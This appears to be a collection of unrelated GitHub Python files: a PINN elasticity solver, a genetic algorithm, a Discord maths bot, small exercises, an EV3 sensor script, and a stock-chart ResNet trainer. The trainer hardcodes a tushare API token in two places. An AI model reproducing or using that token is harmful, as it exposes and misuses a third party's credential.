output_transform_hard_scaled(x, y):\n \"\"\"\n Enforces the Dirichlet BCs in a hard way and scale them.\n\n u_x = u_x * x * 0.001\n u_y = u_y * y * 0.001\n \"\"\"\n\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*x*0.001, v*y*0.001], axis=1)\n\ndef output_transform_scaled(x, y):\n \"\"\"\n Scale the network output:\n\n u_x = u_x * 0.001\n \"\"\"\n u = y[:, 0:1]\n v = y[:, 1:2]\n return tf.concat([ u*0.001, v*0.001], axis=1)\n\n# two inputs x and y, two outputs ux and uy\nlayer_size = [2] + [50] * 5 + [2]\nactivation = \"tanh\"\ninitializer = \"Glorot uniform\"\nnet = dde.maps.FNN(layer_size, activation, initializer)\n\noutput_scaling = True\n\nif soft_dirichlet:\n if output_scaling:\n net.apply_output_transform(output_transform_scaled)\nelse:\n if output_scaling:\n net.apply_output_transform(output_transform_hard_scaled)\n else:\n net.apply_output_transform(output_transform_hard)\n\nloss_scaling = True\n\nif loss_scaling:\n loss_weights = [1,1,1,1,1e6,1e6,1,1,1,1]\nelse:\n if not soft_dirichlet:\n loss_weights = [1,1,1,1,1,1,1,1]\n else:\n loss_weights = [1,1,1,1,1,1,1,1,1,1]\n\nmodel = dde.Model(data, net)\n# train adam\nmodel.compile(\"adam\", lr=0.001, loss_weights=loss_weights)\nlosshistory, train_state = model.train(epochs=4000, display_every=200)\n#train l-bfgs\nmodel.compile(\"L-BFGS\", loss_weights=loss_weights)\nmodel.train()\n\nvtu_and_plot_name = \"Lame_quarter_e_2000_soft_scaled_weighted\"\n\n###################################################################################\n############################## VISUALIZATION PARTS ################################\n###################################################################################\n\ndef compareModelPredictionAndAnalyticalSolution(model):\n '''\n This function plots analytical solutions vs the predictions. 
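Radial displacement and the radial/tangential stresses are sampled along y = 0, compared with the closed-form Lame solution, and the relative L2 errors are printed.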
\n '''\n\n nu,_,_,e_modul = problem_parameters()\n \n r = np.linspace(radius_inner, radius_outer,100)\n y = np.zeros(r.shape[0])\n\n dr2 = (radius_outer**2 - radius_inner**2)\n\n sigma_rr_analytical = radius_inner**2*pressure_inlet/dr2*(r**2-radius_outer**2)/r**2\n sigma_theta_analytical = radius_inner**2*pressure_inlet/dr2*(r**2+radius_outer**2)/r**2\n u_rad_analytical = radius_inner**2*pressure_inlet*r/(e_modul*(radius_outer**2-radius_inner**2))*(1-nu+(radius_outer/r)**2*(1+nu))\n\n r_x = np.hstack((r.reshape(-1,1),y.reshape(-1,1)))\n disps = model.predict(r_x)\n u_pred, v_pred = disps[:,0:1], disps[:,1:2]\n u_rad_pred = np.sqrt(u_pred**2+v_pred**2)\n sigma_xx, sigma_yy, sigma_xy = model.predict(r_x, operator=stress_plane_stress)\n sigma_rr, sigma_theta, sigma_rtheta = polar_transformation_2d(sigma_xx, sigma_yy, sigma_xy, r_x)\n\n err_norm_disp = np.sqrt(np.sum((u_rad_pred.flatten()-u_rad_analytical.flatten())**2))\n ex_norm_disp = np.sqrt(np.sum(u_rad_analytical.flatten()**2))\n rel_err_l2_disp = err_norm_disp/ex_norm_disp\n print(\"Relative L2 error for displacement: \", rel_err_l2_disp)\n\n err_norm_stress = np.sqrt(np.sum((sigma_rr_analytical-sigma_rr.flatten())**2+(sigma_theta_analytical-sigma_theta.flatten())**2))\n ex_norm_stress = np.sqrt(np.sum(sigma_rr_analytical**2+sigma_theta_analytical**2))\n rel_err_l2_stress = err_norm_stress/ex_norm_stress\n print(\"Relative L2 error for stress: \", rel_err_l2_stress)\n\n fig, axs = plt.subplots(1,2,figsize=(12,5))\n\n axs[0].plot(r/radius_inner, sigma_rr_analytical/radius_inner, label = r\"Analytical $\\sigma_{r}$\")\n axs[0].plot(r/radius_inner, sigma_rr/radius_inner, label = r\"Predicted $\\sigma_{r}$\")\n axs[0].plot(r/radius_inner, sigma_theta_analytical/radius_inner, label = r\"Analytical $\\sigma_{\\theta}$\")\n axs[0].plot(r/radius_inner, sigma_theta/radius_inner, label = r\"Predicted $\\sigma_{\\theta}$\")\n axs[0].set(ylabel=\"Normalized radial stress\", xlabel = r\"r/$R_i$\")\n axs[1].plot(r/radius_inner, u_rad_analytical/radius_inner, label = r\"Analytical $u_r$\")\n axs[1].plot(r/radius_inner, u_rad_pred/radius_inner, label = r\"Predicted $u_r$\")\n axs[1].set(ylabel=\"Normalized radial displacement\", xlabel = r\"r/$R_i$\")\n axs[0].legend()\n axs[0].grid()\n axs[1].legend()\n axs[1].grid()\n fig.tight_layout()\n\n plt.savefig(vtu_and_plot_name)\n plt.show()\n\nX = geom.random_points(600, random=\"Sobol\")\nboun = geom.random_boundary_points(100, random=\"Sobol\")\nX = np.vstack((X,boun))\nX_corners = np.array([[radius_inner, 0],[radius_outer, 0],[0, radius_inner],[0, radius_outer]])\nX = np.vstack((X,X_corners))\n\ndisplacement = model.predict(X)\nsigma_xx, sigma_yy, sigma_xy = model.predict(X, operator=stress_plane_stress)\nsigma_rr, sigma_theta, sigma_rtheta = polar_transformation_2d(sigma_xx, sigma_yy, sigma_xy, X)\n\ncombined_disp = tuple(np.vstack((np.array(displacement[:,0].tolist()),np.array(displacement[:,1].tolist()),np.zeros(displacement[:,0].shape[0]))))\ncombined_stress = tuple(np.vstack((np.array(sigma_xx.flatten().tolist()),np.array(sigma_yy.flatten().tolist()),np.array(sigma_xy.flatten().tolist()))))\ncombined_stress_polar = tuple(np.vstack((np.array(sigma_rr.tolist()),np.array(sigma_theta.tolist()),np.array(sigma_rtheta.tolist()))))\n\nx = X[:,0].flatten()\ny = X[:,1].flatten()\nz = np.zeros(y.shape)\ntriang = tri.Triangulation(x, y)\n\n#masking off the unwanted triangles\ncondition = np.isclose(np.sqrt((x[triang.triangles]**2+y[triang.triangles]**2)),np.array([1, 1, 1]))\ncondition = ~np.all(condition, 
axis=1)\n\ndol_triangles = triang.triangles[condition]\noffset = np.arange(3,dol_triangles.shape[0]*dol_triangles.shape[1]+1,dol_triangles.shape[1])\ncell_types = np.ones(dol_triangles.shape[0])*5\n\nfile_path = os.path.join(os.getcwd(), vtu_and_plot_name)\n\nunstructuredGridToVTK(file_path, x, y, z, dol_triangles.flatten(), offset, \n cell_types, pointData = { \"displacement\" : combined_disp,\"stress\" : combined_stress, \"stress_polar\": combined_stress_polar})\n\ncompareModelPredictionAndAnalyticalSolution(model)","repo_name":"imcs-compsim/pinns_for_comp_mech","sub_path":"elasticity_2d/linear_elasticity/lame/Lame_problem_quarter.py","file_name":"Lame_problem_quarter.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"93"} +{"seq_id":"17556919558","text":"import numpy as np\nimport math as m\nimport numpy.random as random\nimport Parser\nfrom tqdm import tqdm\n\n\ndef init_pop(n, params):\n libs = params[\"libs\"]\n population = np.zeros((n, libs.size)).astype(int)\n for i in range(0, n):\n population[i, :] = np.random.permutation(libs.size)\n return population\n\n\ndef fitness(population, params):\n # return np.zeros(population.shape[0])\n score = params[\"score\"]\n deadline = params[\"days\"]\n delay = params[\"signup\"]\n books = params[\"books\"]\n per_day = params[\"ships\"]\n fit = np.zeros(population.shape[0])\n lib_score = np.zeros(population.shape[1])\n for i in range(0, population.shape[0]):\n day = 0\n for lib in population[i]:\n day += delay[lib]\n ships = min((deadline - day)*per_day[lib], len(books[lib]))\n if ships <= 0:\n break\n lib_score[lib] = params[\"cumscore\"][lib][ships-1]\n fit[i] = lib_score.sum()\n lib_score.fill(0)\n return fit\n\n\n\ndef linrank(fit, s=1.5):\n if s > 2:\n s = 2\n elif s < 1:\n s = 1\n n = fit.size\n indices = np.argsort(fit)\n rank = np.zeros_like(fit)\n for i in range(0, n):\n idx = indices[i]\n rank[idx] = (2-s)/n + 2*i*(s-1)/(n*(n-1))\n return rank\n\n\ndef exprank(fit):\n n = fit.size\n indices = np.argsort(fit)\n rank = np.zeros_like(fit)\n for i in range(0, n):\n idx = indices[i]\n rank[idx] = (1-m.exp(-i))\n rank = rank/rank.sum()\n return rank\n\n\ndef sus(ranking, n_sel):\n n_pop = ranking.size\n if n_sel > n_pop:\n return\n sel_idx = np.zeros(n_sel).astype(int)\n idx_list = np.linspace(0, n_pop-1, n_pop).astype(int)\n cdf = np.cumsum(ranking)\n for i in range(0, n_sel):\n r = (i + random.rand())/n_sel\n sel_idx[i] = idx_list[cdf >= r][0]\n np.random.shuffle(sel_idx)\n return sel_idx\n\n\ndef tournament(ranking, n_sel, size=3):\n sel_idx = np.zeros(n_sel).astype(int)\n n_ind = ranking.size\n for i in range(0, n_sel):\n drafted = random.permutation(range(0, n_ind))[0:size]\n cdf = np.cumsum(ranking[drafted])/ranking[drafted].sum()\n r = random.rand()\n sel_idx[i] = drafted[cdf >= r][0]\n return sel_idx\n\n\ndef crossover(parents, prob):\n children = np.array(parents)\n for i in range(0, parents.shape[0]-1, 2):\n if random.rand() > prob:\n break\n child1 = children[i]\n child2 = children[i+1]\n parent1 = parents[i]\n parent2 = parents[i+1]\n sz = parents.shape[1]\n r1 = random.randint(0, sz)\n r2 = random.randint(0, sz)\n p1 = min(r1, r2)\n p2 = max(r1, r2)\n ic = (p2+1) % sz\n ip = (p2+1) % sz\n while ic != p1:\n if child1[p1:p2+1].__contains__(parent2[ip]):\n ip = (ip+1) % sz\n else:\n child1[ic] = parent2[ip]\n ic = (ic+1) % sz\n ip = (ip+1) % sz\n ic = (p2+1) % sz\n ip = (p2+1) % sz\n while ic != p1:\n if 
child2[p1:p2+1].__contains__(parent1[ip]):\n                ip = (ip+1) % sz\n            else:\n                child2[ic] = parent1[ip]\n                ic = (ic+1) % sz\n                ip = (ip+1) % sz\n    return children\n\n\ndef mutate(parents, prob):\n    mutated = np.array(parents)\n    for i in range(0, parents.shape[0]):\n        if random.rand() > prob:\n            break\n        r1 = random.randint(0, parents.shape[1])\n        r2 = random.randint(0, parents.shape[1])\n        p1 = min(r1, r2)\n        p2 = max(r1, r2)\n        np.random.shuffle(mutated[i][p1:p2+1])\n    return mutated\n\n\ndef best_n(p_fit, c_fit, n):\n    total = np.append(p_fit, c_fit)\n    indices = np.argsort(total)\n    return indices[-1:-n-1:-1]\n\n\ndef round_robin(p_fit, c_fit, n, q):\n    if q < 2:\n        q = 2\n    elif q > (len(p_fit) + len(c_fit)):\n        q = (len(p_fit) + len(c_fit))\n    total = np.append(p_fit, c_fit)\n    drafts = np.zeros_like(total).astype(int)\n    wins = np.zeros_like(total).astype(int)\n    for i in range(0, total.size):\n        matches = q-drafts[i]\n        for j in range(0, matches):\n            opponent = random.randint(0, total.size)\n            while opponent == i:\n                opponent = random.randint(0, total.size)\n            match = [i, opponent]\n            drafts[match] += 1\n            win_idx = np.argmax(total[match])\n            winner = match[int(win_idx)]\n            wins[winner] += 1\n    most_wins = np.argsort(wins)\n    return most_wins[-1:-n-1:-1]\n\n\ndef local_opt(pop, data, size):\n    opt = np.array(pop)\n    n = 5\n    jmax = min(len(pop)-1, n*size)\n    for i in range(0, len(pop)):\n        for j in range(0, jmax, size):\n            selected = pop[i][j:j+size]\n            sort_idx = np.argsort(data[\"signup\"][selected])\n            # reorder the selected window itself by signup time\n            opt[i][j:j+size] = selected[sort_idx]\n            fit = fitness(np.array([pop[i], opt[i]]), data)\n            if fit[1] > fit[0]:\n                pop[i] = opt[i]\n\n\ndef run(n_ind, gens, params, p_cross=0., p_mut=0., elitism=0.1, pop=None):\n    n_child = m.floor(n_ind*(1-elitism))\n    if pop is None:\n        pop = init_pop(n_ind, params)\n    p_fit = np.zeros(n_ind)\n    c_fit = np.zeros(n_child)\n    for g in tqdm(range(0, gens)):\n        p_fit = fitness(pop, params)\n        if g % 50 == 0:\n            print(p_fit[np.argsort(p_fit)[-1]])\n        rank = linrank(p_fit, 1.2)\n        # rank = exprank(p_fit)\n        # parent_idx = sus(rank, n_child)\n        parent_idx = tournament(rank, n_child)\n        parents = pop[parent_idx, :]\n        children = crossover(parents, p_cross)\n        children = mutate(children, p_mut)\n        c_fit = fitness(children, params)\n        new_idx = best_n(p_fit, c_fit, n_ind)\n        # new_idx = round_robin(p_fit, c_fit, n_ind, 10)\n        pop = np.append(pop, children)\n        pop = pop.reshape(n_ind+n_child, parents.shape[1])[new_idx, :]\n        local_opt(pop, params, pop.size//20)\n    return pop\n\n\ndef main():\n    ex = \"f_libraries_of_the_world.txt\"\n    data = Parser.read_in_file2(\"input/\"+ex)\n    # best = d_opt(data)\n    # print(fitness(np.array([best]), data))\n    pop = None\n    gens = 10\n    con = \"Y\"\n    while con.upper() == \"Y\":\n        pop = run(50, gens, data, p_cross=0.5, p_mut=0.9, elitism=0.1, pop=pop)\n        con = input(\"continue? 
Y/N\\n\")\n if con.upper() == \"Y\":\n gens = int(input(\"Number of generations: \"))\n best = pop[fitness(pop, data).argsort()[-1]]\n print([best, fitness(np.array([best]), data)])\n Parser.write_output_file2(\"output/\"+ex, best, data)\n\n\ndef b_opt(data):\n sort_idx = data[\"signup\"].argsort()\n return data[\"libs\"][sort_idx]\n\n\ndef d_opt(data):\n a = np.zeros(data[\"libs\"].size).astype(int)\n for lib in data[\"libs\"]:\n a[lib] = data[\"cumscore\"][lib][-1]\n sort_idx = np.argsort(a)\n return data[\"libs\"][sort_idx]\n\nmain()","repo_name":"Belpaire/HashCeud","sub_path":"ga.py","file_name":"ga.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"5034434402","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 29 16:10:26 2020\n\n@author: andrew\n\"\"\"\n\nclass Solution:\n def hammingWeight(self, n: int) -> int:\n \n ans = 0\n while(n!=0):\n n &= (n-1)\n ans += 1\n return ans\n \n# 此题为技巧题 题意是一个无符号的int 变成二进制 有多少个1\n# &与的关系 特点 如果n和n-1连个数进行 &预算 \n# 如: 1010和 1001 &后 = 1000 即10和01 & 变为00\n# n 的每一次 &= 都会消除掉最末尾的1 所以消除几次变为0 就有几个1","repo_name":"Houchangxi/LeetCode-practice","sub_path":"191. Number of 1 Bits.py","file_name":"191. Number of 1 Bits.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"93"} +{"seq_id":"41115250921","text":"import discord\nfrom discord.ext import commands\nimport os\nfrom random import choice as random\nfrom io import BytesIO\nfrom urllib.parse import quote\nfrom aiohttp import ClientSession\nfrom sympy import latex\nfrom sympy.parsing.sympy_parser import parse_expr\nimport json\n\nLATEX_URL = (\n \"https://latex.codecogs.com/png.download?%5Cdpi%7B150%7D%20%5Cbg_white%20%5Chuge%20\"\n)\n\nwith open(\"resources/file.json\") as file:\n data = json.load(file)\n\nclass Maths(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n @commands.command(\n brief=\"Generate Junior Mathematical Competition problem, usage: .jmc \"\n )\n async def jmc(self, ctx, year: int): # from years 2004 - 2018\n year = str(year)\n\n try:\n question = data[\"JMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2004-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"JMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n\n @commands.command(\n brief=\"Generate Intermediate Mathematical Competition problem, usage: .imc \"\n )\n async def imc(self, ctx, year: int): # from years 2004 - 2018\n year = str(year)\n\n try:\n question = data[\"IMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2004-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"IMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n \n\n @commands.command(\n brief=\"Generate Senior Mathematical Competition problem, usage: .smc \"\n )\n async def smc(self, ctx, year: int): # from years 2005 - 2018\n year = str(year)\n\n try:\n question = data[\"SMC\"][year][\"questions\"]\n except:\n await ctx.send(\"Sorry, can only be between 2005-2018\")\n return\n\n question = random(question)\n\n embed = discord.Embed(title=\"SMC-\"+year, colour=0x00008B)\n embed.set_image(url=question)\n \n await ctx.send(embed=embed)\n\n @commands.command(brief=\"Latex\")\n async def latexify(self, ctx, expr: str):\n 
fixed_expr = expr.replace(\"^\", \"**\")\n        try:\n            parsed = parse_expr(fixed_expr, evaluate=False)\n        except SyntaxError:\n            await ctx.send(\"Invalid expression!\")\n        else:\n            ltx = latex(parsed)\n            urlsafe = quote(ltx)\n            async with ClientSession() as session:\n                async with session.get(LATEX_URL + urlsafe) as resp:\n                    bytes_img = await resp.read()\n\n            file = discord.File(fp=BytesIO(bytes_img), filename=\"latex.png\")\n            await ctx.send(file=file)\n\ndef setup(client):\n    client.add_cog(Maths(client))\n","repo_name":"RealJammy/The-Jambot","sub_path":"cogs/maths.py","file_name":"maths.py","file_ext":"py","file_size_in_byte":2927,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"93"} +{"seq_id":"33667757345","text":"class Vehicles:\n    def __init__(self):\n        self.type = None\n        self.speed = None\n        self.color = None\n        self.doors = 4\n\n    def print_data(self):\n        print(self.type, self.speed, self.color, self.doors)\n\n\nclass Cars(Vehicles):\n    def __init__(self, type, speed, color):\n        super().__init__()\n        self.type = type\n        self.speed = speed\n        self.color = color\n\n\nclass Bike(Vehicles):\n    def __init__(self, type, speed, color):\n        super().__init__()\n        self.type = type\n        self.speed = speed\n        self.color = color\n\n        self.doors = None\n\n    def print_data(self):\n        print(\"Hello I'M a bike!\")\n\n\nmy_car = Cars(\"Audi\", 100, \"Red\")\nyour_car = Cars(\"Mercedes\", 150, \"Blue\")\n\nmy_bike = Bike(\"Csepel\", 10, \"White\")\n\nmy_car.print_data()\nyour_car.print_data()\n\nmy_bike.print_data()","repo_name":"robertvari/pycore-210109-3","sub_path":"06_inheritance.py","file_name":"06_inheritance.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"3425327430","text":"import math\nimport myLibrary as Lib\nimport matplotlib.pyplot as plt\n\ndef f(y,x):\n    return (y*(math.log(y))/x)\neuexp1=Lib.forward_euler(f,math.exp(1),2,10,0.5)\neuexp2=Lib.forward_euler(f,math.exp(1),2,10,0.2)\neuexp3=Lib.forward_euler(f,math.exp(1),2,10,0.05)\nprcor1=Lib.predictor_corrector(f,math.exp(1),2,10,0.5)\nprcor2=Lib.predictor_corrector(f,math.exp(1),2,10,0.2)\nprcor3=Lib.predictor_corrector(f,math.exp(1),2,10,0.05)\n\n\nplt.plot(euexp1[0], euexp1[1])\nplt.plot(prcor1[0], prcor1[1])\nplt.title(\"y vs x (step size 0.5) \")\nplt.xlabel(\"x -->\")\nplt.ylabel(\"y -->\")\n\nplt.show()\nplt.plot(euexp2[0], euexp2[1])\nplt.plot(prcor2[0], prcor2[1])\nplt.title(\"y vs x (step size 0.2)\")\nplt.xlabel(\"x -->\")\nplt.ylabel(\"y -->\")\n\nplt.show()\n\nplt.plot(euexp3[0], euexp3[1])\nplt.plot(prcor3[0], prcor3[1])\nplt.title(\"y vs x (step size 0.05)\")\nplt.xlabel(\"x -->\")\nplt.ylabel(\"y -->\")\n\nplt.show()\n\n","repo_name":"hawexrutile/P346","sub_path":"CPLA7/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"23452767559","text":"input = open(\"input.txt\", \"r\")\ncrabs = []\n\n\nfor crab in input:\n    crabs = crab.split(\",\")\ncount = 0\nfor crab in crabs:\n    crabs[count] = int(crab)\n    count += 1\n\nfewestFuel = [0, 0]\n\n\ni = 0\nfor crab in crabs:\n    totalFuel = 0\n    for crab in crabs:\n        totalFuel += abs(crab - i)\n    if fewestFuel[0] == 0:\n        fewestFuel = [totalFuel, i]\n    else:\n        if fewestFuel[0] > totalFuel:\n            fewestFuel = [totalFuel, i]\n        else:\n            pass\n    i += 
1\n\nprint(fewestFuel)\n","repo_name":"snail-brain/Advent2021","sub_path":"Day7/pt1.py","file_name":"pt1.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"4464964013","text":"import torch.nn as nn\r\nimport torchvision\r\nimport numpy as np\r\nfrom torch.optim import Adam\r\nimport torch\r\nimport cv2\r\nimport os\r\nimport glob\r\nfrom torch.utils.data import Dataset, DataLoader, random_split\r\nimport tools\r\nimport get_train_image\r\nimport random\r\nimport torch.nn.functional as F\r\nfrom torchvision import models, transforms\r\nimport tushare as ts\r\nts.set_token('d7dc8dcedbac88a7179f9100c2b2d40b8a322dce8da6c080dc8d1c90')\r\npro = ts.pro_api()\r\npro = ts.pro_api('d7dc8dcedbac88a7179f9100c2b2d40b8a322dce8da6c080dc8d1c90')\r\n\r\n\r\nclass SelfDataSet(Dataset):\r\n    def __init__(self, data_path):\r\n        self.data_path = data_path\r\n        self.imgs_path = glob.glob(os.path.join(data_path, '*.png'))\r\n\r\n\r\n    def __getitem__(self, index):\r\n        # read the image and its label\r\n        image_path = self.imgs_path[index]\r\n        class_name = image_path.split('_')\r\n        class_name = class_name[-1]\r\n        class_name = class_name.split('.')\r\n        class_name = int(class_name[0])\r\n        class_name = np.array([class_name])\r\n        class_name = class_name.astype(np.int64)\r\n        label = torch.from_numpy(class_name)\r\n        one_hot = torch.nn.functional.one_hot(label, num_classes=3)\r\n\r\n        image = cv2.imread(image_path)\r\n        image = image.reshape(3, 128, 128)\r\n        return image, one_hot\r\n\r\n    def __len__(self):\r\n        return len(self.imgs_path)\r\n\r\n# Training function. We simply have to loop over our data iterator and feed the inputs to the network and optimize.\r\ndef train(num_epochs, batch_size):\r\n    # Instantiate a neural network model\r\n    # model = torch.load('vit_b_16_valuation_pt')\r\n    model = torchvision.models.resnet18(num_classes=3)\r\n    print(model)\r\n    # Define your execution device\r\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n    print(\"The model will be running on\", device, \"device\")\r\n    # Convert model parameters and buffers to CPU or Cuda\r\n    torch.backends.cudnn.benchmark = True\r\n    model.to(device)\r\n    # load the dataset\r\n    train_dataset = SelfDataSet('valuation')\r\n    train, valid = random_split(train_dataset,[0.7,0.3])\r\n    train_loader = DataLoader(train, batch_size=batch_size, shuffle=True, num_workers=4, pin_memory=True)\r\n    valid_loader = DataLoader(valid, batch_size=batch_size, shuffle=True, num_workers=4, pin_memory=True)\r\n    # Define the loss function with Classification Cross-Entropy loss and an optimizer with Adam optimizer\r\n    loss_fn = nn.CrossEntropyLoss()\r\n    optimizer = Adam(model.parameters(), lr=0.01)\r\n    min_valid_loss = float('inf')\r\n\r\n    for e in range(num_epochs):\r\n        train_loss = 0.0\r\n        model.train() # Optional when not using Model Specific layer\r\n        for data, labels in train_loader:\r\n            data = data.to(device=device, dtype=torch.float32)\r\n            labels = labels.to(device=device, dtype=torch.float32)\r\n\r\n            optimizer.zero_grad()\r\n            target = model(data)\r\n            label_squeeze = torch.squeeze(labels, dim=1)\r\n            loss = loss_fn(target, label_squeeze)\r\n            loss.backward()\r\n            optimizer.step()\r\n            train_loss += loss.item()\r\n\r\n        valid_loss = 0.0\r\n        model.eval() # Optional when not using Model Specific layer\r\n        for data, labels in valid_loader:\r\n            data = data.to(device=device, dtype=torch.float32)\r\n            labels = labels.to(device=device, dtype=torch.float32)\r\n\r\n            target = model(data)\r\n            
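# the dataset yields one-hot labels with an extra axis (batch, 1, 3);\r\n            # squeeze it so CrossEntropyLoss receives (batch, num_classes) targets\r\n            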
label_squeeze = torch.squeeze(labels, dim=1)\r\n            loss = loss_fn(target, label_squeeze)\r\n            valid_loss += loss.item() * data.size(0)\r\n\r\n        print(f'Epoch {e + 1} \\t\\t Training Loss: {train_loss / len(train_loader)} \\t\\t Validation Loss: {valid_loss / len(valid_loader)}')\r\n        if min_valid_loss > valid_loss:\r\n            print(f'Validation Loss Decreased({min_valid_loss:.6f}--->{valid_loss:.6f}) \\t Saving The Model')\r\n            min_valid_loss = valid_loss\r\n            # Saving State Dict\r\n            torch.save(model, 'resnet18' + '.pt')\r\n\r\n    # for epoch in range(num_epochs):\r\n    #     model.train()\r\n    #     running_loss = 0.0\r\n    #     i = 0\r\n    #     for image, label in train_loader:\r\n    #         optimizer.zero_grad(set_to_none=True)\r\n    #         image = image.to(device=device, dtype=torch.float32)\r\n    #         label = label.to(device=device, dtype=torch.float32)\r\n    #         pred=model(image)\r\n    #         label_squeeze = torch.squeeze(label, dim=1)\r\n    #         loss = loss_fn(pred, label_squeeze)\r\n    #         loss.backward()\r\n    #         i = i + 1\r\n    #         running_loss = running_loss+loss.item()\r\n    #         optimizer.step()\r\n    #     loss_avg_epoch = running_loss/i\r\n    #     print('epoch: %d avg loss: %f' % (epoch, loss_avg_epoch))\r\n    #     if loss_avg_epoch < bes_los:\r\n    #         bes_los = loss_avg_epoch\r\n    #         torch.save(model, 'resnet18_valuation_pt')\r\n\r\n\r\ndef random_append_samples():\r\n    append_folder = 'append'\r\n    if (os.path.exists(append_folder)) == False:\r\n        os.mkdir(append_folder)\r\n    append_folder = os.getcwd() + '//' + 'append'\r\n    # randomly sample training data from 1995 onwards\r\n    date_today = tools.get_date_today()\r\n    end_date = tools.get_delta_date(date_today, -183)\r\n    trade_date_list = get_train_image.get_trade_date_list_period('19950101', end_date)\r\n    device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n    net = torch.load('resnet18.pt')\r\n    ok_count = 0\r\n    fail_count = 0\r\n    while True:\r\n        print('*********************')\r\n        try:\r\n            i = random.randint(0, len(trade_date_list) - 1)\r\n            trade_date = trade_date_list[i]\r\n            print(trade_date)\r\n            ts_code_list = get_train_image.get_ts_code_list(trade_date)\r\n            j = random.randint(0, len(ts_code_list) - 1)\r\n            ts_code = ts_code_list[j]\r\n            append_image_name = append_folder + '//' + ts_code + '_' + trade_date + '_out.png'\r\n            # find the max and min closing prices over this quarter and the next one\r\n            start_date, _ = tools.get_season_border(trade_date, 0)\r\n            _, end_date = tools.get_season_border(trade_date, 1)\r\n            daily_data = pro.daily(ts_code=ts_code, start_date=start_date, end_date=end_date)\r\n            # print(daily_data)\r\n            max_price = daily_data['close'].max()\r\n            idmax = daily_data['close'].idxmax()\r\n            min_price = daily_data['close'].min()\r\n            idmin = daily_data['close'].idxmin()\r\n\r\n            class_label = 0\r\n            if idmin <= idmax:\r\n                class_label = 0\r\n            if idmin > idmax:\r\n                if (max_price-min_price)/min_price < 1.0:\r\n                    class_label = 1\r\n                else:\r\n                    class_label = 2\r\n\r\n            if os.path.exists(append_image_name):\r\n                pass\r\n            else:\r\n                image_src = get_train_image.get_valuation_image(ts_code, trade_date)\r\n                tran = transforms.ToTensor()\r\n                image = tran(image_src)\r\n                image = image.to(device=device, dtype=torch.float32)\r\n                image = image.view(1, 3, 128, 128)\r\n                out = net(image)\r\n                out = F.softmax(out, dim=1)\r\n                out = out.cpu()\r\n                out = out.detach().numpy()\r\n                out = out[0]\r\n                value_predict = 0.0\r\n                for i in range(3):\r\n                    value_predict = value_predict + float(i)*out[i]\r\n                print(class_label)\r\n                print(out)\r\n                # delta = abs((value_predict-value_estimate)/value_estimate)\r\n                # if delta > 0.2:\r\n                #     append_image_name = append_image_name.replace('.png', '_' + str(int(price_estimate)) + '.png')\r\n                #     
cv2.imwrite(append_image_name, image_src)\r\n # fail_count = fail_count + 1\r\n # else:\r\n # ok_count = ok_count + 1\r\n # print('fail:' + str(fail_count))\r\n # print('ok:' + str(ok_count))\r\n\r\n except:\r\n pass\r\nif __name__ == \"__main__\":\r\n # Let's build our model\r\n # train(num_epochs=2000, batch_size=32)\r\n random_append_samples()\r\n","repo_name":"heubme2020/middle_system","sub_path":"train_valuation.py","file_name":"train_valuation.py","file_ext":"py","file_size_in_byte":8261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"17892900630","text":"t = int(input())\nwhile t > 0 :\n s = input()\n s = s+\" \"\n dem = 1\n for i in range(len(s)-1) :\n if s[i] == s[i+1] :\n dem+=1\n else :\n print(str(dem) + s[i] , end =\"\")\n dem = 1\n print()\n t-=1","repo_name":"trung11012002/Python-code-ptit","sub_path":"Ma_hoa_1.py","file_name":"Ma_hoa_1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"93"} +{"seq_id":"10343504514","text":"#!/usr/bin/env pybricks-micropython\n\n# pybrick imports\nfrom pybricks import ev3brick as brick\nfrom pybricks.ev3devices import (Motor, TouchSensor, ColorSensor,\n InfraredSensor, UltrasonicSensor, GyroSensor)\nfrom pybricks.parameters import (Port, Stop, Direction, Button, Color,\n SoundFile, ImageFile, Align)\nfrom pybricks.tools import wait, print\n\n\ndef displayColorValues(port):\n \"Continously prints color values at given port\"\n print(\"displayColorValues\")\n # creat the sensor object from the ColorSensor class\n sensor = ColorSensor(port)\n i = 0\n while True:\n # have four different ways of using this\n # sensor!\n color = sensor.color()\n print(i)\n i += 1\n # Color.BLACK, Color.BLUE, Color.GREEN, Color.YELLOW, Color.RED, Color.WHITE, Color.BROWN or None\n if color == Color.BLACK:\n c = \"Black\"\n elif color == Color.BLUE:\n c = \"Blue\"\n elif color == Color.GREEN:\n c = \"Green\"\n elif color == Color.YELLOW:\n c = \"Yellow\"\n elif color == Color.RED:\n c = \"Red\"\n elif color == Color.WHITE:\n c = \"White\"\n else:\n c = \"Unknown\"\n print(\"color = \", c) \n wait(1000)\n\ndef displayLightValue(port):\n \"Continously prints all values from color sensor at 